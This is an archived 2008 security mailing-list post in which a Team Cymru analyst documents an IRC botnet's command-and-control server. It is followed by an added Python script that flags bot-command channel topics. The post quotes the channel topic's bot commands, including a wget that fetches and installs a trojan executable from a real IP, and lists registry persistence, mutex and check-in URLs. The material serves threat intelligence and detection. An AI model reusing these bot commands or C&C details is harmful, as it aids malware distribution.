[nsp-sec] history on irc.intelligence-tech.com
Stephen Gill
gillsr at cymru.com
Mon Feb 25 16:25:19 EST 2008
# telnet irc.intelligence-tech.com 21958
Trying 8.14.145.68...
Connected to irc.intelligence-tech.com.
Escape character is '^]'.
NICK b
USER b b b :b
:IntTech 001 a :MySQL <...>
:IntTech 376 a :
:a MODE a :+i
JOIN #hobo nutsack
:<...> JOIN :#hobo
:IntTech 332 a #hobo :.asc -S -s|.else status scan .asc asn 50 5 0 _b _r _h|.if nick *USA* .wkse 50 5 0 _b _r _h|.else nick *USA* .wkso 50 5 0 _b _r _h|.r.wget http://8.14.145.115/~inttech/mstskmgr.exe c:\mstskmgr.exe h
:IntTech 333 a #hobo 10:30 PM 1200102639
:IntTech 366 a #hobo :End of /NAMES list.
Brief history on that file:
2008-01-08 12:50:01 mstskmgr.exe.aug3.0017
2007-01-04 00:51:05 http://www.naturalgardening.net/mstskmgr.exe
2007-02-01 11:01:13 129517.mstskmgr.exe
2007-02-10 07:42:52 730a87979a5aa825c5b5f547e1e7d014.exe
2007-02-14 13:46:04 mstskmgr.exe
2007-02-26 13:31:08 mstskmgr.exe
2007-04-02 18:01:02 none
2007-06-06 21:23:48 4f1582d388f19cfab7042f97e94170bcfcd4913c
2007-07-12 21:31:15 mstskmgr.exe
2007-07-15 02:16:08 730a87979a5aa825c5b5f547e1e7d014.EX$
2007-07-24 04:11:52 730a87979a5aa825c5b5f547e1e7d014.EX$
2007-07-29 04:36:17 http://www.intelligence-tech.com/mstskmgr.exe
2007-08-22 11:41:32 http://www.intelligence-tech.com/mstskmgr.exe
2007-11-06 02:37:17 http://8.14.145.115/~inttech/mstskmgr.exe
2006-11-18 20:16:04 mstskmgr.exe
dnsrr                        count   dnsrr first seen
www.intelligence-tech.com    8       2007-01-09 12:39:43
www.int-tech.info            7       2007-01-09 12:39:43
Adds:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "MS Task Manager 32" = C:\WINDOWS\System32\mstskmgr.exe
Mutex:
MSTSKMGR32
Since it has been around the block, the AV rate is pretty good:
AV engine Country Signature
Ahnlab KR Win-Trojan/Ranky.20480.F
Aladdin (esafe) IL Win32.Ranky.de
Alwil (avast) CZ Win32:Ranky-ED [Trj]
Arcabit (arcavir) PL Trojan.Proxy.Ranky.De
Authentium US W32/Proxy.gen1
Avira (antivir) DE TR/Crypt.ULPM.Gen
BitDefender RO Trojan.Proxy.Ranky.E
CA (E-Trust Vet) US Win32/Ranck!generic
CAT (quickheal) IN TrojanProxy.Ranky.de
Central Command (vexira) US Trojan.PR.Ranky.FP
ClamAV no_virus
CPsecure US no_virus
Cybersoft (vfind) US no_virus
Dr. Web RU Trojan.Proxy.1707
Eset (nod32) US Win32/TrojanProxy.Ranky
Fortinet US W32/Ranky.DE!tr
Frisk (f-prot) IS W32/Proxy.gen1
F-Secure FI Trojan-Proxy.Win32.Ranky.de
Grisoft (avg) CZ Proxy.IAX
Hauri (virobot) KR no_virus
Ikarus AT Trojan-Proxy.Win32.Ranky.DE
Kaspersky RU Trojan-Proxy.Win32.Ranky.de
Mcafee US Proxy-FBSR.gen
MicroWorld (escan) IN Trojan-Proxy.Win32.Ranky.de
Norman NO W32/Rank.AHV
Panda ES Trj/Ranky.QL
Rising CN Trojan.Proxy.Ranky.ayw
Securecomputing (webwasher) US Trojan.Crypt.ULPM.Gen
Sophos GB Troj/Ranky-AU
Symantec US Backdoor.Ranky
TheHacker PE Trojan/Proxy.Ranky.de
Trend Micro JP TROJ_RANKY.NF
VirusBlokAda (vba32) BY Trojan-Proxy.Win32.Ranky.de
VirusBuster HU Trojan.PR.Ranky.FP
Proxy checks in to:
http://www.int-tech.info/main.php?p=21164 -> the port it chose to listen to
Cheers,
Steve, Team Cymru.
On 2/25/08 1:41 PM, "Jason Chambers" <jchambers at ucla.edu> wrote:
> ----------- nsp-security Confidential --------
>
> Hello all,
>
> I've noticed in our recent infections that 8.14.145.68 is involved with
> a few. Looking back at some past data, I see this botnet as far back as
> 2007-03-04.
>
> Anyone have any more information on this one ?
>
> 3356 | LEVEL3 Level 3 Communications | 8.14.145.68 | tcp | 25394
> | 2008-02-03 10:22:45 | 2008-02-11 10:22:45 | bot | 0 | 0 | ID: Int
> Tech DNSRR: irc.intelligence-tech.com PORTS: 21958
>
> 3356 | LEVEL3 Level 3 Communications | 8.14.145.68 | tcp | 25394
> | 2007-03-04 09:49:52 | 2007-03-12 09:49:52 | bot | 0 | 0 | ID: Int
> Tech DNSRR: irc.intelligence-tech.com PORTS: 21958_6667
>
>
> Thanks,
--
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 312 924 4023 | gillsr at cymru.com
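The topic of #hobo above is a pipelined list of bot commands ending in a download of mstskmgr.exe, which is a usable detection signal on captured IRC traffic. The following is an added example (not code from the post or from Team Cymru) that parses RPL_TOPIC (numeric 332) replies out of a transcript and flags topics that look like C&C instructions; the sample transcript is constructed from the lines quoted above, and the "two or more dot-commands, or a URL to an .exe" heuristic is an assumption of this example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the server replies shown in the post (same hostnames
# and IP; not live data).
SAMPLE_IRC = """\
:IntTech 001 a :MySQL <...>
:IntTech 376 a :
:a MODE a :+i
:IntTech 332 a #hobo :.asc -S -s|.else status scan .asc asn 50 5 0 _b _r _h|.if nick *USA* .wkse 50 5 0 _b _r _h|.else nick *USA* .wkso 50 5 0 _b _r _h|.r.wget http://8.14.145.115/~inttech/mstskmgr.exe c:\\mstskmgr.exe h
:IntTech 333 a #hobo 10:30 PM 1200102639
:IntTech 366 a #hobo :End of /NAMES list.
"""

# RPL_TOPIC: ":<server> 332 <nick> <channel> :<topic>"
TOPIC_RE = re.compile(r"^:(\S+) 332 (\S+) (\S+) :(.*)$")
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class TopicFinding:
    server: str
    channel: str
    commands: list = field(default_factory=list)  # '|'-separated commands
    urls: list = field(default_factory=list)      # download URLs (IoCs)
    suspicious: bool = False


def parse_topics(raw: str) -> list:
    """Extract channel topics from IRC server replies and flag those that
    carry pipelined bot commands or fetch a remote executable."""
    findings = []
    for line in raw.splitlines():
        m = TOPIC_RE.match(line.strip())
        if not m:
            continue
        server, _nick, channel, topic = m.groups()
        cmds = [c.strip() for c in topic.split("|") if c.strip()]
        urls = URL_RE.findall(topic)
        # Assumed heuristic: human topics are prose; bot topics are lists
        # of dot-commands and/or point at an executable to download.
        dotted = sum(1 for c in cmds if c.startswith("."))
        exe_url = any(u.lower().split("?")[0].endswith(".exe") for u in urls)
        findings.append(TopicFinding(server, channel, cmds, urls,
                                     suspicious=(dotted >= 2 or exe_url)))
    return findings


if __name__ == "__main__":
    for f in parse_topics(SAMPLE_IRC):
        print(f.channel, "suspicious" if f.suspicious else "benign", f.urls)
```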